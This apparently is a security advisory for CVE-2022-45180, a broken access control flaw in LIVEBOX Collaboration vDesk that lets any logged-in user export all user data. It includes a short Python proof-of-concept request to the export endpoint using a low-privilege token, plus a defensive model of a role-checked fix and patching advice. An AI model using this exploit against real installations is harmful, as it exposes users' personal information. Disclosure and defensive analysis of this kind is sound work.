Summary:
An issue has been discovered in LIVEBOX Collaboration vDesk up to v018 that allows a malicious user with low privileges to export information about all users in the system. This operation is supposed to be available only to the system administrator.

Vulnerability Details

A Broken Access Control vulnerability was uncovered in LIVEBOX Collaboration vDesk. It allows any user authenticated to the system, regardless of their privileges, to export information about all users via the API endpoint /api/v1/vdesk_{DOMAIN}/export. This functionality should be available only to system administrators.

All LIVEBOX Collaboration vDesk installations up to version v018 are affected. If you have LIVEBOX Collaboration vDesk in your environment, make sure the necessary updates have been applied to protect against this vulnerability.

Exploit

The exploit can be performed by a user authenticated to the product without any specific privilege: by accessing the API endpoint /api/v1/vdesk_{DOMAIN}/export, such a user can export all user information.

Here is the code snippet showcasing how the Broken Access Control vulnerability could be exploited:

import requests

# Token of an authenticated account with no special privileges
evil_user_token = "malicious_user_token"
DOMAIN = "example.com"
api_url = f"https://vdesk.{DOMAIN}/api/v1/vdesk_{DOMAIN}/export"

headers = {
    "Authorization": f"Bearer {evil_user_token}"
}

# The endpoint only verifies that the caller is authenticated, not that it is an administrator
response = requests.post(api_url, headers=headers)

if response.status_code == 200:
    print("Successfully exported all user information!")
    exported_data = response.json()
else:
    print("Failed to exploit the vulnerability.")

Replace the evil_user_token variable above with a valid token of a low-privileged user in the LIVEBOX Collaboration vDesk environment. The script then sends a request to the vulnerable API endpoint; if it succeeds, it prints that the exploit was successful and stores the exported data in the exported_data variable.

Mitigation

The developers of LIVEBOX Collaboration vDesk have released updates that address this vulnerability. If you are using a vulnerable version of the software, it's advised to update your LIVEBOX Collaboration vDesk immediately.

* Official LIVEBOX Collaboration vDesk Website
* LIVEBOX Collaboration vDesk Changelog

We cannot emphasize enough the importance of keeping your software up to date, especially products with sensitive information, such as LIVEBOX Collaboration vDesk. Regular checks for updates, patching, and reviewing access control policies will help protect your systems from vulnerabilities and exploitation.
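The root cause of this class of bug is an endpoint that checks authentication but not authorization. The following is an added illustration, not vDesk's code: a minimal Python handler model in which the export route is guarded by a server-side role check that denies by default and records refused attempts for review. The role name, user directory and request model are constructed for the example.

```python
from dataclasses import dataclass
from functools import wraps

ADMIN_ROLE = "admin"  # constructed role name; vDesk's real role model is not described here

@dataclass
class User:
    name: str
    role: str

@dataclass
class Request:
    user: User
    path: str

# Constructed user directory standing in for the data the export endpoint returns
USERS = [User("alice", ADMIN_ROLE), User("bob", "user"), User("carol", "user")]

# Refused requests are recorded so repeated probing of the export endpoint is visible to defenders
AUDIT_LOG: list = []

def require_role(role):
    """Authorization guard: the caller must be authenticated AND hold `role`."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(request):
            if request.user.role != role:
                AUDIT_LOG.append(f"DENY {request.user.name} -> {request.path}")
                return 403, {"error": "forbidden"}
            return handler(request)
        return wrapper
    return decorator

def export_users_vulnerable(request):
    # Authenticated, but no authorization check: any logged-in user gets the full export.
    return 200, [{"name": u.name, "role": u.role} for u in USERS]

@require_role(ADMIN_ROLE)
def export_users_fixed(request):
    # Same handler body; the guard above refuses non-administrators before it runs.
    return 200, [{"name": u.name, "role": u.role} for u in USERS]

def call_export(handler, user, domain="example.com"):
    """Dispatch a request for the export path to the given handler and return (status, body)."""
    return handler(Request(user, f"/api/v1/vdesk_{domain}/export"))

if __name__ == "__main__":
    bob = User("bob", "user")
    print("vulnerable:", call_export(export_users_vulnerable, bob)[0])  # 200
    print("fixed:     ", call_export(export_users_fixed, bob)[0])       # 403
    print(AUDIT_LOG)
```

The same pattern applies to any real framework: the check belongs on the server side of every privileged route, and a 403 on the export path from a non-administrator account is worth alerting on.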

Conclusion

CVE-2022-45180 is a critical security vulnerability that exposes users' information in systems running LIVEBOX Collaboration vDesk up to v018 by allowing authenticated users with low privileges to export all user data. Updating the software and ensuring proper access control policies in your environment are mandatory to safeguard your systems from this vulnerability.

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC